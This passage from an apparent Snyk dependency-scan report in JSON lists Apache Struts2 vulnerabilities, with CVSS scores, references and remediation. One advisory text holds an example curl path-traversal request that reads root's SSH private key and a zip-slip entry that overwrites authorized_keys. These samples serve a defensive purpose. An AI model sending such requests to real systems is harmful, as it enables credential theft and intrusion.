Advisory" - }, - { - "url": "https://github.com/apache/struts/commit/030ffa33543f8953306ed0c0dc815c7fb74d7129", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/8e67b9144aa643769b261e2492cb561e04d016ab", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:03.921305Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:32.508677Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:03.921305Z" - } - ], - "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\nAffected versions of the package are vulnerable to Directory Traversal.\n\n## Details\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\r\n\r\nDirectory Traversal vulnerabilities can be generally divided into two types:\r\n\r\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\r\n\r\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\r\n\r\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\r\n\r\n```\r\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\r\n```\r\n**Note** `%2e` is the URL encoded version of `.` (dot).\r\n\r\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \r\n\r\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\r\n\r\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\r\n\r\n```\r\n2018-04-15 22:04:29 ..... 19 19 good.txt\r\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\r\n```\n\n\n## References\n- [Apache Security Advisory](http://struts.apache.org/docs/s2-042.html)\n", - "epssDetails": { - "percentile": "0.89019", - "probability": "0.02019", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-6795" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.415000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-10-19T01:09:09.263000Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-10-19T01:09:09.263000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:47:03.921305Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.31" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-31495", - "title": "Arbitrary Command Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:R", - "credit": [ - "LGTM Security Team" - ], - "semver": { - "vulnerable": [ - "[,2.3.34)", - "[2.4,2.5.13)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.34", - "2.5.13" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-052", - "title": "Apache Security Bulletin" - }, - { - "url": "https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax", - "title": "Apache Struts Statement on Equifax Security Breach" - }, - { - "url": "https://www.exploit-db.com/exploits/42627", - "title": "Exploit DB" - }, - { - "url": "https://github.com/apache/struts/commit/19494718865f2fb7da5ea363de3822f87fbda26", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/6dd6e5cfb7b5e020abffe7e8091bd63fe97c10a", - "title": "GitHub Commit" - }, - { - "url": "https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement", - "title": "LGTM Advisory" - }, - { - "url": "https://lgtm.com/blog/apache_struts_CVE-2017-9805", - "title": "LGTM Vulnerability Details" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-9805.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:47:48.667611Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:R", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:15.532569Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:48.667611Z" - } - ], - "description": "## Overview\r\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\r\n\r\nThe REST Plugin in affected versions use a `XStreamHandler` with an instance of XStream for deserialization without any type filtering. By design, there are few limits to the type of objects XStream can handle. This flexibility comes at a price. The XML generated or consumed by XStream includes all information required to build Java objects of almost any type. The provided XML data is used by XStream to unmarshal Java objects. An attacker could use this flaw to execute arbitrary code or conduct further attacks.\r\n\r\n[A working exploit](https://github.com/rapid7/metasploit-framework/commit/5ea83fee5ee8c23ad95608b7e2022db5b48340ef) is publicly available and [is actively](https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/) exploited in the wild.\r\n\r\nYou can read more about this vulnerability [on our blog](https://snyk.io/blog/equifax-breach-vulnerable-open-source-libraries/).\r\n\r\n# Details\r\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker control the state or the flow of the execution. \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n- Apache Blog\r\n\r\n\r\n## Remediation\r\nDevelopers are strongly advised to upgrade their _Apache Struts_ components to version `2.3.34`, `2.5.13` or higher.\r\n\r\nIt is possible that some REST actions stop working because of applied default restrictions on available classes. In this case please investigate the new interfaces that were introduced to allow class restrictions per action, those interfaces are:\r\n* org.apache.struts2.rest.handler.AllowedClasses\r\n* org.apache.struts2.rest.handler.AllowedClassNames\r\n* org.apache.struts2.rest.handler.XStreamPermissionProvider\r\n\r\nIf for some reason upgrading is not an option, consider the following workarounds:\r\n1. Disable handling XML pages and requests to such pages\r\n```xml\r\n\r\n```\r\n\r\n2. Override getContentType in XStreamHandler\r\n```java\r\n public class MyXStreamHandler extends XStreamHandler { \r\n public String getContentType() {\r\n return \"not-existing-content-type-@;/&%$#@\";\r\n }\r\n }\r\n```\r\n\r\n3. Register the handler by overriding the one provided by the framework in your struts.xml\r\n```xml\r\n\r\n\r\n```\r\n\r\n## References\r\n- [LGTM Advisory](https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement)\r\n- [LGTM Vulnerability Details](https://lgtm.com/blog/apache_struts_CVE-2017-9805)\r\n- [Apache Struts Statement on Equifax Security Breach](https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax)\r\n- [Apache Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-052)", - "epssDetails": { - "percentile": "0.99995", - "probability": "0.97541", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-9805" - ], - "CWE": [ - "CWE-20", - "CWE-502" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-09-06T17:28:23.339000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2017-09-05T17:28:23Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2017-09-06T17:28:23Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:26.345481Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.34" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-31500", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Yasser Zamani" - ], - "semver": { - "vulnerable": [ - "[2.3.7,2.3.33)", - "[2.5,2.5.12)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.33", - "2.5.12" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://lists.apache.org/thread.html/3795c4dd46d9ec75f4a6eb9eca11c11edd3e796c6c1fd7b17b5dc50d@%3Cannouncements.struts.apache.org%3E", - "title": "Apache Security Advisory" - }, - { - "url": "https://github.com/apache/struts/commit/086b63735527d4bb0c1dd0d86a7c0374b825ff2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/0d6442bab5b44d93c4c2e63c5335f0a331333b9", - "title": "GitHub Commit" - }, - { - "url": "http://struts.apache.org/docs/s2-049.html", - "title": "Struts Security Bulletin" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:51.213194Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:16.872773Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:51.213194Z" - } - ], - "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) attacks.\nWhen using a Spring AOP functionality to secure Struts actions it is possible to perform a DoS attack.\n\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.33, 2.5.12 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-049.html)\n- [Struts Announcements Mailing List](https://lists.apache.org/thread.html/3795c4dd46d9ec75f4a6eb9eca11c11edd3e796c6c1fd7b17b5dc50d@%3Cannouncements.struts.apache.org%3E)\n", - "epssDetails": { - "percentile": "0.91602", - "probability": "0.03467", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-9787" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-09-12T12:47:32.905000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2017-07-13T15:29:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2017-09-12T12:47:32.905000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:47:51.213194Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.33" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-31501", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Adam Cazzolla", - "Jonathan Bullock" - ], - "semver": { - "vulnerable": [ - "[2.3.7,2.3.34)", - "[2.5,2.5.13)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.34", - "2.5.13" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/3fddfb6eb562d597c935084e9e81d43ed6bcd02", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/418a20c0594f23764fe29ced400c1219239899a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/744c1f409d983641af3e8e3b573c2f2d2c2c6d9", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/8a04e80f01350c90f053d71366d5e0c2186fded", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/9d47af6ffa355977b5acc713e6d1f25fac260a2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/a05259ed69a5a48379aa91650e4cd1cb4bd6e5a", - "title": "GitHub Commit" - }, - { - "url": "http://struts.apache.org/docs/s2-050.html", - "title": "Struts Security Bulletin" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:48.540352Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:13.755151Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:48.540352Z" - } - ], - "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. This is due to an incomplete fix for [CVE-2017-7672](https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-31499). If an application allows enter an URL in a form field and built-in URLValidator is used, it is possible to prepare a special URL which will be used to overload server process when performing validation of the URL.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.34, 2.5.13 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-050.html)\n", - "epssDetails": { - "percentile": "0.90011", - "probability": "0.02403", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-9804" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-09-12T12:47:32.905000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2017-08-23T21:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2017-09-12T12:47:32.905000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:47:48.540352Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.34" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-31502", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Huijun Chen", - "Xiaolong Zhu" - ], - "semver": { - "vulnerable": [ - "[2.3.7,2.3.34)", - "[2.5,2.5.13)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.34", - "2.5.13" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "http://struts.apache.org/docs/s2-051.html", - "title": "Struts Security Bulletin" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:51.883631Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:13.751396Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:51.883631Z" - } - ], - "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (ReDoS) attacks. The REST Plugin is using outdated XStream library which is vulnerable and allow perform a DoS attack using malicious request with specially crafted XML payload.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.34, 2.5.13 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-051.html)\n", - "epssDetails": { - "percentile": "0.99002", - "probability": "0.93195", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-9793" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-09-12T12:47:32.905000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2017-08-23T21:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2017-09-12T12:47:32.905000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:47:51.883631Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.34" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-31503", - "title": "Arbitrary Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "credit": [ - "Lupin", - "David Greene", - "Roland McIntosh" - ], - "semver": { - "vulnerable": [ - "[,2.3.34)", - "[2.4,2.5.12)" - ] - }, - "exploit": "Functional", - "fixedIn": [ - "2.3.34", - "2.5.12" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-053", - "title": "Apache Security Bulletin" - }, - { - "url": "https://github.com/brianwrf/S2-053-CVE-2017-12611", - "title": "Exploit" - }, - { - "url": "https://github.com/apache/struts/commit/2306f5f7fad7f0157f216f34331238feb0539fa", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/637ad1c3707266c33daabb18d7754e795e6681f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-12611.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:50.788695Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:06:02.858095Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:50.788695Z" - } - ], - "description": "## Overview\r\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\r\n\r\nAffected versions of this package are vulnerable to arbitrary code execution. Using expression literals or forcing expressions in Freemarker tags (see example snippet below), and using request values can lead to remote code execution.\r\n\r\n```xml\r\n<@s.hidden name=\"redirectUri\" value=redirectUri />\r\n<@s.hidden name=\"redirectUri\" value=\"${redirectUri}\" />\r\n<@s.hidden name=\"${redirectUri}\"/>\r\n```\r\n\r\nIn both cases a writable property is used in the value attribute and in both cases this is treated as an expression by Freemarker. Please be aware that using Struts expression evaluation style is safe:\r\n\r\n```\r\n<@s.hidden name=\"redirectUri\" value=\"%{redirectUri}\" />\r\n<@s.hidden name=\"%{redirectUri}\"/>\r\n```\r\n\r\n## Remediation\r\nDevelopers are strongly advised to upgrade their _Apache Struts_ components to version `2.3.34`, `2.5.12` or higher.\r\n\r\n## References\r\n- [Apache Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-053)", - "epssDetails": { - "percentile": "0.99858", - "probability": "0.97300", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-12611" - ], - "CWE": [ - "CWE-20", - "CWE-502" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-09-06T17:28:23.339000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2017-09-05T17:28:23Z", - "exploitDetails": { - "sources": [ - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Functional", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of 